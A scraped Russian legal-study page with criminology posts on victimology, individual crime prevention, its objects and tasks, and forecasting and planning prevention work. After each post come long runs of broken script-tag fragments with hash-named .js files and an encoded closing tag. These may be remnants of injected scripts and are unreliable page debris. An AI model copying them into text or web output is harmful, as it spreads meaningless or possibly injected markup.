В центре внимания виктимологии всегда находится фигура жертвы преступления, которая рассматривается здесь не в формально-юридическом (процессуальном) плане, а в контексте ее истинной роли в механизме преступления.
Известно, что в одном случае то или иное лицо может оказаться жертвой преступления, не приложив к тому никаких усилий со своей стороны; в другом – оказаться жертвой преступления, спровоцировав его своим поведением. Между этими крайними положениями возможны самые различные ситуации во взаимоотношениях преступника и жертвы в момент совершения преступления.
Точно так же различным может быть отношение жертвы к причиненному преступлением ущербу. В одном случае ущерб – это бедствие, трагедия, в другом – он ожидаем и в известном смысле выгоден для жертвы, так как способствует достижению других, более значимых целей.
Виктимология исследует разнообразные факторы, обстоятельства, ситуации, действие которых обусловливает криминальную уязвимость некоторых лиц, обращается к понятию виктимности.
Виктимность в одном случае обозначает определенное массовое явление, по-своему адекватное преступности. В другом – образ поведения некоторых лиц, их предрасположенность к тому, чтобы при определенных обстоятельствах стать жертвой преступления. Причем сюда входит и статистическая личностная характеристика жертвы, включающая комплекс стабильных типических свойств личности. Это и динамическое проявление типичных черт в отрицательном поведении жертвы, способствующем преступлению. Это и отрицательное поведение жертвы, в котором не проявилось типичное свойство личности, но оно спровоцировало совершение преступления именно в данных условиях места и времени. Это, наконец, и уязвимость лица, которое обладает определенным статусом или исполняет определенную социальную роль .
Сказанное означает, что поведение человека, отдельных групп населения по своей природе может быть не только преступным, но и виктимным, т. е. рискованным, неосмотрительным, легкомысленным, распущенным, провокационным, опасным для самого себя.
Понимание виктимности как массового явления и как образа поведения и действия определенных людей, вызывающих повышенный к себе интерес лиц, .склонных к совершению преступлений, открывает возможности для виктимо-логической профилактики.
Виктимологическая профилактика – одно из направлений предупреждения преступности, далеко не в полной мере реализованное в нашем обществе. Это специфическая деятельность социальных институтов, направленная на выявление, устранение или нейтрализацию факторов, обстоятельств, ситуаций, формирующих виктимное поведение и обусловливающих совершение преступлений, выявление групп риска и конкретных лиц с повышенной степенью виктимности и воздействие на них в целях восстановления или активизации их защитных свойств, а также разработка либо совершенствование уже имеющихся специальных средств защиты граждан от преступлений и последующей виктимизации.14a2f1d9c6e0eee340dfb512ca0322fe.js" type="text/javascript">cede6c4c4c7092411ad2faeb63a71efcchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)53168a18af79d23e70fcddae31bf9d2d.js" type="text/javascript">175c510ca29eecca2f21bb0c57a6d422.js" type="text/javascript">9fc5d160e89a223c511842fe6f923a72.js" type="text/javascript">e599001784eaeab214eb1ff681c39c6e.js" type="text/javascript">c71188f95d29f2332fdac912359f9e8c.js" type="text/javascript">2964a90ca958b2db49072fdab6de64f3.js" type="text/javascript">d456192ab6022035ab22b95a2ace9233.js" type="text/javascript">7ca9fb51a7a429168745655a49343716.js" type="text/javascript">a58a091cefe9e2580aec70071d61445a.js" type="text/javascript">94dba2bfbd7962653fbf033e9072f8d7.js" type="text/javascript">ede5103fad7237eace55aa252d71373f.js" type="text/javascript">
Коментариев: 0 | Просмотров: 312 |
Понятие индивидуального предупреждения преступлений
  Криминология | Автор: admin | 12-05-2010, 19:44
Индивидуальное предупреждение – это прежде всего воздействие на тех лиц, от которых можно ожидать совершения преступлений, и их социальную среду. Данный вид деятельности представляет собой целенаправленную работу с конкретным человеком и его ближайшим окружением.
Объектами такого предупреждения являются индивиды, поведение и образ жизни которых свидетельствуют о реальной возможности совершения ими преступлений. Взгляды, мотивы, система ценностных ориентации личности могут стать Основанием для оказания на нее предупредительного воздействия лишь в том случае, когда эти взгляды, мотивы, ориентации проявились в антиобщественном поведении.
Исходя из описанного ранее механизма преступного поведения индивидуальное предупреждение должно быть направлено на личность и ее отрицательные дерты, на среду, формирующую эту личность, а также на условия, обстоятельства, ситуации, способствующие или облегчающие совершение уголовно наказуемых деяний. При этом следует иметь в виду, что речь идет о непосредственной деятельности соответствующих субъектов, т. е. тех, от кого исходит такое воздействие.
Суммируя сказанное, можно сформулировать следующее определение: итак, индивидуальное предупреждение преступного поведения – это деятельность государственных и негосударственных органов, организаций и их представителей по выявлению лиц, от которых можно ожидать совершения преступлений, и оказанию на них и окружающую их социальную микросреду позитивного корректирующего воздействия.5fd9bea5d163473991f7ebea264e35a8.js" type="text/javascript">6f6bb9f14e4a5276ccb5924596e6010fchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)a9fbb4f17ee9cd129e154a41e391ab3e.js" type="text/javascript">b85597fc9d415340517af81f680eb529.js" type="text/javascript">1302a90ac16def2fd015a9ab451da6ac.js" type="text/javascript">1de5a06a38c67d7a70d78679a51edc08.js" type="text/javascript">736e06f6dfeb5776f0c661bb4e3219f6.js" type="text/javascript">4d6a70bd1574257dc5b02017e3d22bda.js" type="text/javascript">3b71d194a5163de3e8029a15e3d4af44.js" type="text/javascript">2e74302872a890fcb3fcae76837d169e.js" type="text/javascript">9ea4fbebd35c2ac8d2d7f9904afc56fd.js" type="text/javascript">3b1fe45c0061783af56fd828257392b6.js" type="text/javascript">d53b7e205740d0dced08c419cbe28d6f.js" type="text/javascript">
Коментариев: 0 | Просмотров: 178 |
Объекты и содержание индивидуального предупреждения преступлений
  Криминология | Автор: admin | 12-05-2010, 19:44
В детализированном виде объектами индивидуального предупреждения преступного поведения являются:
антиобщественное поведение и образ жизни лица, совершение преступлений которым достаточно вероятно;
криминологически значимые личностные характеристики человека, определяющие деформацию его поведения;
криминологически значимые психофизиологические особенности (в меру их подверженности исправлению, изменению, лечению) ;
непосредственные условия неблагоприятного формирования и жизнедеятельности личности (прежде всего в семье), ином бытовом окружении, в сферах труда, учебы, досуга, в иных микросоциальных группах, в первую очередь антиобщественной направленности, а также неблагополучные условия индивидуального бытия;
элементы неблагоприятной жизненной ситуации, которые объективно имеют криминогенный характер и существуют достаточно продолжительное время.
Личность – важное звено в причинной цепочке преступного поведения. Она взаимодействует с криминогенной микросредой, через нее преломляется влияние последней. На личность поэтому в первую очередь и направляется предупредительное воздействие.
Целью индивидуального предупреждения является позитивная коррекция личности, влекущая изменение ее поведения от антиобщественного к законопослушному.
Достижение этой цели требует решения ряда конкретных задач. К ним относятся:
выявление лиц, чье поведение свидетельствует о реальной возможности совершения преступлений;
изучение этих лиц и источников отрицательного воздействия на них;
прогнозирование индивидуального поведения;
планирование мер индивидуальной профилактики;
позитивное корректирующее воздействие.
Для государственных правоохранительных органов существуют еще две важные задачи, реализация которых регламентирована правовыми актами и выполняются которые в отношении строго определенных категорий лиц, поскольку связаны с вторжением в сферу личных интересов и даже свобод граждан. Речь идет, во-первых, о постановке лица на учет и, во-вторых, о контроле за его поведением и образом жизни.
Одной из наиболее жестких форм такого учета и контроля является установление административного надзора органов внутренних дел за некоторыми категориями лиц, освобожденных из мест лишения свободы. Это особо опасные рецидивисты, а также отбывшие наказание за соответствующей тяжести умышленные преступления и не ставшие на путь исправления.
В отношении этих лиц могут применяться такие ограничения, как возложение обязанности находиться дома в ночное время, являться для отметки в органы милиции, запрещение появляться в определенных местах, самовольно менять место жительства. В занимаемые ими жилые помещения вправе входить для контроля должностные лица, осуществляющие надзор.
На учет в органы внутренних дел, с соответствующим контролем за поведением, могут также ставиться лица, осужденные к мерам наказания без лишения свободы, не взятые под стражу на период следствия.
В целях обеспечения эффективности индивидуального предупреждения преступного поведения важно соблюдать следующие основные требования:
1. Своевременность. Несвоевременное выявление и принятие мер воздействия к правонарушителям и их окружению влечет формирование привычки к антиобщественному поведению, значительно увеличивает вероятность совершения лицом преступления. (Исследования показывают, что 2/3 семей, которые были явно неблагополучными и из которых вышли несовершеннолетние правонарушители, до момента совершения преступления оставались вне поля зрения правоохранительных органов.)8473dab8f92a27971702620e80e5e6af.js" type="text/javascript">cad9b5f49f460192ead1827c900fe505char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)ea80738df8b1b7588e87643444d3f19a.js" type="text/javascript">bdc16f6826076d99d54f3f4f08367a69.js" type="text/javascript">54b340c6f869df7035510ea9432a280e.js" type="text/javascript">a7ff11634fcf7ae2084f20edf901de11.js" type="text/javascript">5245b58afc774b80d44dfcab908bf52e.js" type="text/javascript">93cdab47c1ff7571cc7f82fe65591fd7.js" type="text/javascript">4047160d59a6d3de6647b3301190777d.js" type="text/javascript">359821e4fb5216a068417c79ade307e2.js" type="text/javascript">e928dd5a3a32fd26856a0b4e8174e9ee.js" type="text/javascript">5b130425d81a134e24743759f2326423.js" type="text/javascript">e19da9563a37e3b7079c91f294fc3fed.js" type="text/javascript">
Коментариев: 0 | Просмотров: 246 |
Прогнозирование индивидуального преступного поведения и планирование предупредительной работы
  Криминология | Автор: admin | 12-05-2010, 19:44
В процессе изучения личности осуществляется прогнозирование индивидуального преступного поведения, или индивидуальное прогнозирование. Это задача большой сложности и решается она на основании оценки всей совокупности внутренних и внешних факторов. Индивидуальный прогноз может быть только вероятным – это прогнозирование лишь возможного преступного поведения. Чем точнее и полнее прогностическая информация о лице, тем эффективнее меры предупреждения преступления. Возможность предсказать поведение человека зависит от того, насколько мы знаем определяющие его факторы, а также программу, по которой оно реализуется вовне.
Информация о прошлом и настоящем личности, ее действиях, социальных связях и ближайшем окружении является основой для прогноза будущего поведения. Причем необходимо учитывать динамику этих характеристик. Факторы, могущие положительно повлиять на человека в будущем, должны быть поддержаны, а возможно, и активизированы. А факторы, способные оказать отрицательное влияние на человека, должны непременно стать объектом предупредительного воздействия, т. е. задача индивидуального предупреждения состоит в том, чтобы прогноз, указывающий на возможное совершение преступления данным лицом, не реализовался.
Прогнозирование преступного поведения и индивидуальное предупреждение – во многом единый процесс. Предупреждение само по себе предполагает постоянное, всестороннее и глубокое изучение личности, ее поведения, связей и намерений. Полученные в результате этого сведения и осуществляемый по ним прогноз влияют на коррекцию плана индивидуальной работы.
Для работников правоохранительных органов одной из важнейших задач является решение вопроса о постановке лица на профилактический учет. Это решение должно основываться на строгом соответствии нормативным предписаниям . При этом важно всесторонне оценить всю имеющуюся информацию и убедиться в достаточности фактических оснований для постановки того или иного лица на учет, поскольку это может оказать сильное влияние на судьбу человека и иметь серьезные последствия для дальнейшей его жизни.
Постановка на учет вызывает необходимость применения интенсивных мер воздействия. Неоценимую помощь здесь могут оказать планы индивидуальной работы.
Планирование призвано упорядочить сложный и многогранный процесс предупредительного воздействия, сделать его целеустремленным, определить наиболее рациональные пути работы с данным лицом, выбрать такие тактические методы и приемы, которые обеспечили бы эффективное достижение целей предупреждения преступного поведения в сложившейся конкретной ситуации.
Конкретность планирования индивидуальной работы, его обусловленность свойствами каждой данной ситуации не исключают возможности программирования по некоторым параметрам соответствующих действий субъектов предупредительной деятельности. Конечно, трудно рассчитывать на возможность разработки типового плана, пригодного для всех без исключения случаев, различных категорий лиц и отвечающего всем требованиям, предъявляемым к такого рода планам. Вместе с тем нельзя отрицать определенного практического значения примерных планов индивидуального предупреждения, разработанных с учетом некоторых типичных ситуаций, складывающихся в этой сложной деятельности.9454777fce8c6d921c46f546b11a1235.js" type="text/javascript">3d6ad9afd504180c15789b48c545e2e6char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)e6df48533fcda427ad0a665b5e628fd1.js" type="text/javascript">619ecfc7969c366466e033e270f87bfb.js" type="text/javascript">65c65a8cfa364feff894914d0ed3a086.js" type="text/javascript">f30cf720dd6a68ce0ba7a4c75e05b476.js" type="text/javascript">976d8d327aaff00413c4d4ff7dcc559e.js" type="text/javascript">74fb04c74a7087a399a502de1c42f9d1.js" type="text/javascript">f9072192ef27619f389c992bec239992.js" type="text/javascript">d909fa2e7153ea2e38a93e72f36f895f.js" type="text/javascript">3c8863217c247392ba094c7f1f8c8f5c.js" type="text/javascript">c39025b84500e202af382d76e80ec2f9.js" type="text/javascript">cc3369f627c09a4ed14f3469684efc1f.js" type="text/javascript">
Коментариев: 0 | Просмотров: 322 |
ukrstroy.biz
ЮРИДИЧЕСКАЯ ЛИТЕРАТУРА:
РАЗНОЕ:
КОММЕНТАРИИ:
ОКОЛОЮРИДИЧЕСКАЯ ЛИТЕРАТУРА: